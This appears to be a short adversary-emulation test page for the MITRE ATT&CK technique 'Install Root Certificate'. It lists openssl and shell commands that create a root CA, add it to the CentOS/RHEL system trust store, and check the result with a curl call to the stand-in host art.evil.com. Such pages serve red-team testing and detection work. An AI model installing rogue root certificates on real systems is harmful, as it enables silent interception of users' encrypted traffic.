Tony M Lambert
20 lines
699 B
Markdown
20 lines
699 B
Markdown
# Install Root Certificate
|
|
|
|
MITRE ATT&CK Technique: [T1130](https://attack.mitre.org/wiki/Technique/T1130)
|
|
|
|
|
|
## Create a root CA with openssl
|
|
openssl genrsa -out rootCA.key 4096
|
|
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -out rootCA.crt
|
|
|
|
## Install root CA on CentOS/RHEL 5 and below
|
|
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
|
|
|
|
## Install root CA on CentOS/RHEL 6 and above
|
|
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
|
|
update-ca-trust
|
|
|
|
## Testing the trusted certificate.
|
|
To test the new trust, apply the root certificate or another signed with it to a SSL/TLS web service and attempt a connection with curl or wget.
|
|
|
|
curl https://art.evil.com |